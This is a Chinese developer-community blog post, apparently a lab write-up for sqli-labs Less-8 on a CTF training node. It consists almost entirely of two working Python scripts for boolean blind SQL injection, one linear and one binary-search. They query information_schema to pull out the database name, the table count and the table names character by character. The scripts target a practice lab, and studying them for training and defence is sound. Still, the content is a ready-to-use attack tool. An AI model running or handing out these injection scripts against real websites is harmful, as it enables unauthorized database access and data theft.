基于 sqli-labs-Pass08，利用Python 实现 SQL盲注（含二分法）-阿里云开发者社区

基于 sqli-labs-Pass08，利用Python 实现 SQL盲注（含二分法）

2024-04-11 38

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 基于 sqli-labs-Pass08，利用Python 实现 SQL盲注（含二分法）

一、SQL盲注脚本（普通版）：

import requests
url = "http://9fe5aba4-b55b-49d8-af3e-795e070d0b23.node5.buuoj.cn/Less-8/"
#获取数据库名称的长度：
payload_len = "?id=1' and length(database()) = {n} --+"
def getLength(url, payload):
    length = 1
    while True:
        response = requests.get(url = url + payload_len.format(n = length))
        if 'You are in...........' in response.text:
            print('数据库名称长度为：', length)
            return length
        else:
            print('正在测试长度：', length)
            length += 1
    
#获取数据库的名称：
payload_str = "?id=1' and ascii(substr(database(), {n}, 1)) = {r} --+"
def getStr(url, payload, length):
    str = '' #初始表名/库名为空
    #第一层循环，截取每一个字符
    for i in range(1, length + 1):
        #第二层循环，枚举取字符的每一种可能性
        for j in range(33, 126):
            response = requests.get(url = url + payload_str.format(n = i, r = j))
            #页面中出现此内容则表示成功
            if 'You are in...........' in response.text:
                str += chr(j)
                print('第', i, '个字符猜解成功：', str)
                break
    return str
#获取数据库名称信息：
#length = getLength(url, payload_len)
#database_name = getStr(url, payload_str, length)
#获取数据库下表的数量：
table_count = 0
for i in range(1, 100):
    payload_table_count = "?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = {n} --+"
    response = requests.get(url = url + payload_table_count.format(n = i))
    if 'You are in...........' in response.text:
        table_count = i
        break
    else:
        print('正在测试长度：', i)
print('数据库下表的数量为：', table_count)
#开始注出数据库下的表的信息：
#注出数据库下表的长度：
table_length = 0
for i in range(0, table_count):
    for j in range(1, 100):
        payload_table_length = "?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit {m},1))={n}--+"
        response = requests.get(url = url + payload_table_length.format(m=i, n=j))
        if 'You are in...........' in response.text:
            table_length = j
            break
        else:
            table_length += 1
            print("正在测试第", i + 1, "张表的长度，长度为：", table_length)
    print("第", i + 1, "张表的长度为：", table_length)
    #注出表名：
    table_name = ""
    for k in range(1, table_length + 1):
        for z in range(65, 127):
            payload_table_name = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit {p}, 1),{q},1)) = {r} --+"
            response = requests.get(url = url + payload_table_name.format(p=i, q=k, r=z))
            if 'You are in...........' in response.text:
                table_name += chr(z)
                print("第", i + 1, "张表的表名为：", table_name)
                break
        
    print("第", i + 1, "张表的表名为：", table_name)

二、SQL盲注脚本（二分法）：

import requests
url = "http://9fe5aba4-b55b-49d8-af3e-795e070d0b23.node5.buuoj.cn/Less-8/"
#获取数据库名称的长度：
payload_len = "?id=1' and length(database()) = {n} --+"
def getLength(url, payload):
    length = 1
    while True:
        response = requests.get(url = url + payload_len.format(n = length))
        if 'You are in...........' in response.text:
            print('数据库名称长度为：', length)
            return length
        else:
            print('正在测试长度：', length)
            length += 1
    
#获取数据库的名称：
payload_str = "?id=1' and ascii(substr(database(), {n}, 1)) = {r} --+"
def getStr(url, payload, length):
    str = '' #初始表名/库名为空
    #第一层循环，截取每一个字符
    for i in range(1, length + 1):
        #第二层循环，枚举取字符的每一种可能性
        for j in range(33, 126):
            response = requests.get(url = url + payload_str.format(n = i, r = j))
            #页面中出现此内容则表示成功
            if 'You are in...........' in response.text:
                str += chr(j)
                print('第', i, '个字符猜解成功：', str)
                break
    return str
#获取数据库名称信息：
#length = getLength(url, payload_len)
#database_name = getStr(url, payload_str, length)
#获取数据库下表的数量：
table_count = 0
for i in range(1, 100):
    payload_table_count = "?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = {n} --+"
    response = requests.get(url = url + payload_table_count.format(n = i))
    if 'You are in...........' in response.text:
        table_count = i
        break
    else:
        print('正在测试长度：', i)
print('数据库下表的数量为：', table_count)
#开始注出数据库下的表的信息：
#注出数据库下表的长度：
table_length = 0
for i in range(0, table_count):
    for j in range(1, 100):
        payload_table_length = "?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit {m},1))={n}--+"
        response = requests.get(url = url + payload_table_length.format(m=i, n=j))
        if 'You are in...........' in response.text:
            table_length = j
            break
        else:
            print("正在测试第", i + 1, "张表的长度，长度为：", j)
    print("第", i + 1, "张表的长度为：", table_length)
    #注出表名：
    table_name = ""
    for k in range(1, table_length + 1):
        min = 33
        max = 126
        mid = (min + max) // 2     
        while min < max: 
            payload_table_name = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit {p}, 1),{q},1)) < {r} --+"
            response = requests.get(url = url + payload_table_name.format(p=i, q=k, r=mid))
            if 'You are in...........' in response.text:
                max = mid
            else:
                min = mid + 1
            mid = (min + max) // 2
        if mid <= 32 or mid >= 127:
            break
        table_name += chr(mid - 1)
        print("正在注出表名：", table_name)
    print("第", i + 1, "张表的表名为：", table_name)

基于 sqli-labs-Pass08，利用Python 实现 SQL盲注（含二分法）

一、SQL盲注脚本（普通版）：

二、SQL盲注脚本（二分法）：

热门文章

最新文章

相关课程

相关电子书

相关实验场景